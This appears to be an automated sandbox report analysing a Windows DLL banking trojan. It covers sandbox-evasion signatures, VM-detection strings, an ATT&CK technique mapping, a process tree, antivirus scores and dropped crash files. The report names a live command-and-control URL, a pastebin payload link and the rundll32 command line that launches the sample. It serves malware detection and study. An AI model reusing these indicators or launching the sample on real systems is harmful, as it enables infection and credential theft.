Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior

Malware Analysis System Evasion

Source: C:\Windows\System32\loaddll32.exe; API/Special instruction interceptor: Address: 6C4D73FB
Source: C:\Windows\System32\loaddll32.exe; API/Special instruction interceptor: Address: 6C4BC236
Source: C:\Windows\System32\loaddll32.exe; API/Special instruction interceptor: Address: 6D2443B0
Source: C:\Windows\System32\loaddll32.exe; API/Special instruction interceptor: Address: 6C4E6720
Source: C:\Windows\System32\loaddll32.exe; API/Special instruction interceptor: Address: 6D0DAB8D
Source: C:\Windows\System32\loaddll32.exe; API/Special instruction interceptor: Address: 6C2E314A
Source: C:\Windows\System32\loaddll32.exe; API/Special instruction interceptor: Address: 6D2A5475
Source: C:\Windows\System32\loaddll32.exe; API/Special instruction interceptor: Address: 6D1DD12D
Source: C:\Windows\System32\loaddll32.exe; API/Special instruction interceptor: Address: 6D32D673
Source: C:\Windows\System32\loaddll32.exe; API/Special instruction interceptor: Address: 6D2641B8
Source: C:\Windows\System32\loaddll32.exe; API/Special instruction interceptor: Address: 6D077FFB
Source: C:\Windows\System32\loaddll32.exe; API/Special instruction interceptor: Address: 6D261491
Source: C:\Windows\System32\loaddll32.exe; API/Special instruction interceptor: Address: 6C4F472C
Source: C:\Windows\System32\loaddll32.exe; API/Special instruction interceptor: Address: 6D1785C2
Source: C:\Windows\System32\conhost.exe; Last function: Thread delayed
Source: C:\Windows\System32\loaddll32.exe; Thread delayed: delay time: 120000
Source: Amcache.hve.11.dr; Binary or memory string: VMware
Source: Amcache.hve.11.dr; Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.11.dr; Binary or memory string: vmci.syshbin
Source: Amcache.hve.11.dr; Binary or memory string: VMware, Inc.
Source: Amcache.hve.11.dr; Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.11.dr; Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.11.dr; Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.11.dr; Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.11.dr; Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.11.dr; Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.11.dr; Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.11.dr; Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.11.dr; Binary or memory string: vmci.sys
Source: Amcache.hve.11.dr; Binary or memory string: vmci.syshbin`
Source: Amcache.hve.11.dr; Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.11.dr; Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.11.dr; Binary or memory string: VMware-42 27 ae 88 8c 2b 21 02-a5 86 22 5b 84 51 ac f0
Source: Amcache.hve.11.dr; Binary or memory string: VMware20,1
Source: Amcache.hve.11.dr; Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.11.dr; Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.11.dr; Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.11.dr; Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.11.dr; Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.11.dr; Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.11.dr; Binary or memory string: VMware PCI VMCI Bus Device
Source: rundll32.exe, 00000006.00000002.2543893551.0000000003092000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll6/
Source: Amcache.hve.11.dr; Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.11.dr; Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.11.dr; Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.11.dr; Binary or memory string: vmci.inf_amd64_68ed49469341f563
Source: C:\Windows\System32\loaddll32.exe; Process information queried: ProcessInformation
Source: C:\Windows\SysWOW64\rundll32.exe; Process queried: DebugPort

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\SysWOW64\rundll32.exe; Network Connect: 192.124.216.14 80
Source: C:\Windows\SysWOW64\cmd.exe; Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\Y7KU3yvGQ6.dll",#1
Source: rundll32.exe, 00000006.00000002.2544670211.0000000004D58000.00000004.00001000.00020000.00000000.sdmp; Binary or memory string: Program Manager@
Source: Amcache.hve.11.dr; Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.11.dr; Binary or memory string: msmpeng.exe
Source: Amcache.hve.11.dr; Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.11.dr; Binary or memory string: MsMpEng.exe
MITRE ATT&CK Matrix (techniques listed per tactic, with the counts shown in the report)

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts
Execution: 2 Command and Scripting Interpreter; Scheduled Task/Job; At; Cron; Launchd
Persistence: 1 DLL Side-Loading; Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script
Privilege Escalation: 112 Process Injection; 1 DLL Side-Loading; Logon Script (Windows); Login Hook; Network Logon Script
Defense Evasion: 1 Masquerading; 1 Rundll32; 11 Virtualization/Sandbox Evasion; 112 Process Injection; 1 DLL Side-Loading
Credential Access: 1 Credential API Hooking; LSASS Memory; Security Account Manager; NTDS; LSA Secrets
Discovery: 121 Security Software Discovery; 2 Process Discovery; 11 Virtualization/Sandbox Evasion; 11 System Information Discovery; Internet Connection Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH
Collection: 1 Credential API Hooking; Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging
Command and Control: 1 Non-Application Layer Protocol; 11 Application Layer Protocol; Steganography; Protocol Impersonation; Fallback Channels
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact
Behavior Graph

Behavior Graph ID: 1572153; Sample: Y7KU3yvGQ6.dll; Start date: 10/12/2024; Architecture: WINDOWS; Score: 96
Sample-level signatures: Suricata IDS alerts for network traffic; Antivirus / Scanner detection for submitted sample; Multi AV Scanner detection for submitted file; 3 other signatures

Process tree (from the behavior graph):
  loaddll32.exe (started): Overwrites code with unconditional jumps - possibly settings hooks in foreign process; Overwrites code with function prologues; Switches to a custom stack to bypass stack traces
    rundll32.exe (started): 192.124.216.14, 49746, 80 EMBANK-ASRU Russian Federation; System process connects to network (likely due to code injection or exploit); Overwrites code with unconditional jumps - possibly settings hooks in foreign process
    rundll32.exe (started): Overwrites code with function prologues
    rundll32.exe (started)
    7 other processes, including:
      rundll32.exe (started): Overwrites code with unconditional jumps - possibly settings hooks in foreign process
        WerFault.exe (started)
      WerFault.exe (started)
      WerFault.exe (started)
      WerFault.exe (started)

Source | Detection | Scanner | Label
Y7KU3yvGQ6.dll | 55% | ReversingLabs | Win32.Trojan.OusabanSpy
Y7KU3yvGQ6.dll | 44% | Virustotal | -
Y7KU3yvGQ6.dll | 100% | Avira | HEUR/AGEN.1360814
Y7KU3yvGQ6.dll | 100% | Joe Sandbox ML | -
No Antivirus matches
No Antivirus matches
No Antivirus matches
Source | Detection | Scanner | Label
http://www.indyproject.org/ | 0% | Avira URL Cloud | safe
http://192.124.216.14/conta/index.phpU | 0% | Avira URL Cloud | safe
http://192.124.216.14/conta/index.php | 0% | Avira URL Cloud | safe
http://www.indyproject.org/ | 0% | Virustotal | -
http://192.124.216.14/conta/index.php | 0% | Virustotal | -
No contacted domains info
Name | Malicious | Antivirus Detection | Reputation
http://192.124.216.14/conta/index.php | true | Virustotal: 0%; Avira URL Cloud: safe | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://192.124.216.14/conta/index.phpU | rundll32.exe, 00000004.00000002.1839038476.000000006A081000.00000020.00000001.01000000.00000003.sdmp, rundll32.exe, 00000006.00000002.2547697268.000000006A081000.00000020.00000001.01000000.00000003.sdmp, rundll32.exe, 00000007.00000002.1771573428.000000006A081000.00000020.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000D.00000002.1832986778.000000006A081000.00000020.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000E.00000002.1894247823.000000006A081000.00000020.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000F.00000002.1874677140.000000006A081000.00000020.00000001.01000000.00000003.sdmp | false | Avira URL Cloud: safe | unknown
http://upx.sf.net | Amcache.hve.11.dr | false | - | high
http://www.indyproject.org/ | rundll32.exe, rundll32.exe, 00000006.00000002.2544670211.0000000004CF0000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.2547697268.000000006A081000.00000020.00000001.01000000.00000003.sdmp, rundll32.exe, 00000007.00000002.1771573428.000000006A081000.00000020.00000001.01000000.00000003.sdmp, rundll32.exe, 00000007.00000002.1771012396.0000000004C50000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000003.1768168983.0000000004AD0000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.1832986778.000000006A081000.00000020.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000D.00000003.1783546072.00000000046C0000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 0000000E.00000002.1894247823.000000006A081000.00000020.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000E.00000002.1893636039.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 0000000F.00000002.1874677140.000000006A081000.00000020.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000F.00000002.1874062186.00000000044D0000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.1834981367.0000000004D80000.00000004.00001000.00020000.00000000.sdmp | false | Virustotal: 0%; Avira URL Cloud: safe | unknown
https://pastebin.com/raw/vn1EtvP0 | rundll32.exe, rundll32.exe, 00000006.00000002.2547697268.000000006A081000.00000020.00000001.01000000.00000003.sdmp, rundll32.exe, 00000007.00000002.1771573428.000000006A081000.00000020.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000D.00000002.1832986778.000000006A081000.00000020.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000E.00000002.1894247823.000000006A081000.00000020.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000F.00000002.1874677140.000000006A081000.00000020.00000001.01000000.00000003.sdmp | false | - | high
IP | Domain | Country | ASN | ASN Name | Malicious
192.124.216.14 | unknown | Russian Federation | 15455 | EMBANK-ASRU | true
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1572153
Start date and time: 2024-12-10 07:25:33 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 7m 13s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 27
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
  • HCA enabled
  • EGA enabled
  • AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: Y7KU3yvGQ6.dll (renamed because original name is a hash value)
Original Sample Name: ed7c5857a2a61a69f73ca5f01c0f1c8c.dll
Detection: MAL
Classification: mal96.evad.winDLL@26/17@0/1
EGA Information: Failed
HCA Information: Failed
Cookbook Comments:
  • Found application associated with file extension: .dll
  • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
  • Excluded IPs from analysis (whitelisted): 20.189.173.22, 13.107.246.63, 4.245.163.56, 40.126.53.11
  • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, login.live.com, blobcollector.events.data.trafficmanager.net, onedsblobprdwus17.westus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
  • Not all processes were analyzed, report is missing behavior information
  • Report size exceeded maximum capacity and may have missing behavior information.
Time | Type | Description
01:26:51 | API Interceptor | 1x Sleep call for process: loaddll32.exe modified
01:27:13 | API Interceptor | 4x Sleep call for process: WerFault.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
192.124.216.14 | Fatura931Pendente956.pdf761.msi | malicious | Unknown | 192.124.216.14/ana/index.php
      No context
Match | Associated Sample Name / URL | Detection | Threat Name | Context
EMBANK-ASRU | Fatura931Pendente956.pdf761.msi | malicious | Unknown | 192.124.216.14
EMBANK-ASRU | https://marketing.edinburghairport.com/4QNA-A60M-5IWCT9-JVKO0-1/c.aspx?_externalContentRedirect=https://link.sbstck.com/redirect/43698733-83ea-4129-b836-e9d43d1ad5ed?j=eyJ1IjoiNDltdXZ6In0.CxolcWPhPGrBgw3rA0jd5lscc71sjQLfIOZNSPA48EY | malicious | Unknown | 192.124.216.133
EMBANK-ASRU | https://marketing.edinburghairport.com/4QNA-A60M-5IWCT9-JVKO0-1/c.aspx?_externalContentRedirect=https://link.sbstck.com/redirect/43698733-83ea-4129-b836-e9d43d1ad5ed?j=eyJ1IjoiNDltdXZ6In0.CxolcWPhPGrBgw3rA0jd5lscc71sjQLfIOZNSPA48EY | malicious | HTMLPhisher | 192.124.216.133
      No context
      No context
Process: C:\Windows\SysWOW64\WerFault.exe
File Type: Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category: dropped
Size (bytes): 65536
Entropy (8bit): 0.9842674127966813
Encrypted: false
SSDEEP: 192:J5iNOF80BU/wjeTf3KZrbzuiFXZ24IO8dci:niEF3BU/wje2zuiFXY4IO8dci
MD5: DE6E224142BC19EFCABB5ED4AFE7E324
SHA1: 80A3EA0B2CA3C7491B611E2F81FDC7CF01A5A2C5
SHA-256: EF44A63921BA74A32D4EF4230176FC330C378836B997560194CB3AE1C4E860D7
SHA-512: 5B5EEE8B12D1759FE6958EB0BD39AB525BFD295EBFB390C9A4A99DF61BABD9DC95D565822A82FDA1F714155323C3634EC3577797452CE137D47DF4A32A41FC7B
Malicious: false
Process: C:\Windows\SysWOW64\WerFault.exe
File Type: Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category: dropped
Size (bytes): 65536
Entropy (8bit): 0.9848072498311455
Encrypted: false
SSDEEP: 192:GKQVYiNOG80BU/wjeTf3KZrbzuiFHZ24IO8dci:tQVYiEG3BU/wje2zuiFHY4IO8dci
MD5: F24019898FCE1EFCA39225500B98D62F
SHA1: AFE2A235E2AA862BA06F7410EF04F77B2D6C2C3F
SHA-256: 7C35968D4159822E457B0C0FBA3156BFB9EDE2DAB48218CB4AFAD099CF3DD66A
SHA-512: 4FB571E6D72A2C0DBE824CF5FEC9B1B3A33EDC527C14DFA8B48A02AF6E9FD7419A6A2917EC809E4EAD0F0D8B28302B9DC2E2B77B65C90AA14DD41396DC707666
Malicious: false
Process: C:\Windows\SysWOW64\WerFault.exe
File Type: Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category: dropped
Size (bytes): 65536
Entropy (8bit): 0.9903302605494385
Encrypted: false
SSDEEP: 192:sCibOM7tn0BU/wjeTfnZrJOzuiFXZ24IO84ci:9iiQt0BU/wjeWzuiFXY4IO84ci
MD5: 3E2E6CC1F0E95CC5D2B359888EB9B2A3
SHA1: 0F1641027E96D8E346FB9E16A5453B8C20C717A0
SHA-256: 61CCFF5A3255C0CB2EDB37605030195FE3589151C461492959268637CB62F804
SHA-512: C42C3BF92F5CF0AA89BD9FCAB5E7D1D5D7DE1E1B7AC77C14580D1B11FCF12C582A2AC62E84689662EC4D50F5C8F6DE4BCB6D261245B40B48BCB5F0594EBCB723
Malicious: false
Process: C:\Windows\SysWOW64\WerFault.exe
File Type: Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category: dropped
Size (bytes): 65536
Entropy (8bit): 0.9903365861443841
Encrypted: false
SSDEEP: 192:MwiwODn0BU/wjeTf3KZrbzuiFHZ24IO84ci:rihD0BU/wje2zuiFHY4IO84ci
MD5: 59298120E248EF343D876735D2A184CF
SHA1: 255A7F1D79222A378A901DCFE1D7D25DE287A64A
SHA-256: 70872E0B00174B59FC9C7010C55170C7F5C40C89993D033B72F298105D913678
SHA-512: 96BF95677D53BAF422049D00EF480CFABAA9CA187661CE86E383E58AC6A74EC3BFA86E95F794B9787A91BFDEA0600327AC8B4D7178E405762B9743CAFF0C4810
Malicious: false
      Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.8.2.8.5.6.3.5.7.5.9.6.3.5.4.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.8.2.8.5.6.3.8.4.6.2.8.2.1.4.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.d.4.9.5.7.0.7.5.-.e.f.a.2.-.4.1.1.d.-.9.f.f.b.-.7.b.b.4.8.2.6.9.9.f.b.c.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.f.8.9.0.5.b.7.-.2.e.3.d.-.4.7.a.7.-.a.6.c.a.-.a.1.4.e.7.2.a.9.1.2.7.d.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.r.u.n.d.l.l.3.2...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.U.N.D.L.L.3.2...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.8.3.4.-.0.0.0.1.-.0.0.1.3.-.4.0.6.0.-.6.e.7.f.c.c.4.a.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.8.f.a.8.8.9.e.4.5.6.a.a.6.4.6.a.4.d.0.a.4.3.4.9.9.7.7.4.3.0.c.e.5.f.a.5.e.2.d.7.!.r.
      Process:C:\Windows\SysWOW64\WerFault.exe
      File Type:Mini DuMP crash report, 14 streams, Tue Dec 10 06:26:49 2024, 0x1205a4 type
      Category:dropped
      Size (bytes):51672
      Entropy (8bit):1.9505716282272412
      Encrypted:false
      SSDEEP:192:Ad4mAaU8lb5+YxXKYUJO5H4+3TxHqVdovS4ZxLUpsZdv8Bqe+lF:e4mAaBJdx5HfjQdMS6xLTZXj
      MD5:01E0C83146E341F05532DC9B4AE48616
      SHA1:3DE34E0B94FA714A49314827ADD309D5FD9DA8EE
      SHA-256:8138D7975AB3804740DF338DECF1DF2FDC4E3F0306A123B61413E7AF24D29C43
      SHA-512:75C7F1719A32D141AB18590937A93B4CA9628CF12A6DEBE33F37633007BF1142E9C29ABE27D891C2677156491AF34D4586EB9F8E2DB4A70CD2E258AA3F35558F
      Malicious:false
      Preview:MDMP..a..... .......).Wg....................................4....4..........T.......8...........T.......................................................................................................................eJ......D ......GenuineIntel............T....... .....Wg.............................0..=...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................
      Process:C:\Windows\SysWOW64\WerFault.exe
      File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
      Category:dropped
      Size (bytes):8356
      Entropy (8bit):3.6936522029563714
      Encrypted:false
      SSDEEP:192:R6l7wVeJa06Dvw6YvU6oigmf84eprB89bbJsfopm:R6lXJh6Lw6Yc6Ngmf84NbifL
      MD5:0CFEEEE497A839C117695E54EA6340C8
      SHA1:916356CD276755228EAE3B1E4B52DA9C88078D8F
      SHA-256:BA2427A190D3CCC83CC845A2BFF78D9C86C341AAF466EDE27213926C9A547325
      SHA-512:C7D31F62CBA062892752D6C175202D87E7A608BF29738E9C31B679E744CDA07C822D93AFFC8C978144F98522F3E277CAEC80531DA15F6F85B06AC8C540DF0D2E
      Malicious:false
      Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.9.4.4.<./.P.i.
      Process:C:\Windows\SysWOW64\WerFault.exe
      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
      Category:dropped
      Size (bytes):4751
      Entropy (8bit):4.460839373281276
      Encrypted:false
      SSDEEP:48:cvIwWl8zslJg77aI9SNWpW8VY8Ym8M4JCdPKZFu5+q8vjPKRLGScS5d:uIjf/I7k87V4JhMKmRLJ35d
      MD5:6FBDDB201057660179DB49782A47C5D4
      SHA1:E1C8D49AE35298D6B28896D1BB5886732D871715
      SHA-256:9B959040B6D5C6C70FCF00DD86D4707947467DAA6E5E61472AF4CF2506A9205F
      SHA-512:E3B74439CDDAA8F36C893C726E7A056FB0AFB331571F0CB8F143DFB1E9089BD1C27628E80A6D5B0872864518E8D1725C258F6F07B7B30B0B74F03A82DA7162FB
      Malicious:false
      Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="624809" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
      Process:C:\Windows\SysWOW64\WerFault.exe
      File Type:Mini DuMP crash report, 14 streams, Tue Dec 10 06:26:57 2024, 0x1205a4 type
      Category:dropped
      Size (bytes):45204
      Entropy (8bit):2.094103365036255
      Encrypted:false
      SSDEEP:192:IxyBXQ8/XAIjfO5H4e3uo0WOEbNUbrHY49ecyPhU:Prpy5H3QibNG44uPm
      MD5:44B783C4259B14E29E52678A4BF8C684
      SHA1:26698030BD84A916B5B07F93321A5332FF10CC7D
      SHA-256:69E8702EA24F89CC77873F01AA7600C73175D2CF666B91B54AF192885344F930
      SHA-512:0BCECCE8D8319538137277F8DFF3CA18E32D3AC37829CB7544DB4F06610E2403691722F7D611888AF087ABF441D743DD987D41E8AD09712F3F4A10C559BFA97D
      Malicious:false
      Preview:MDMP..a..... .......1.Wg.........................................1..........T.......8...........T.......................................|...............................................................................eJ....... ......GenuineIntel............T.............Wg.............................0..=...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................
      Process:C:\Windows\SysWOW64\WerFault.exe
      File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
      Category:dropped
      Size (bytes):8320
      Entropy (8bit):3.696619060373029
      Encrypted:false
      SSDEEP:192:R6l7wVeJdi6e96YKK6bVgmfT4epr689bkisfcsm:R6lXJY6e96Y/6bVgmfT4gkhfO
      MD5:D456099D31EC697D2F9B0B4BE8F1D1F1
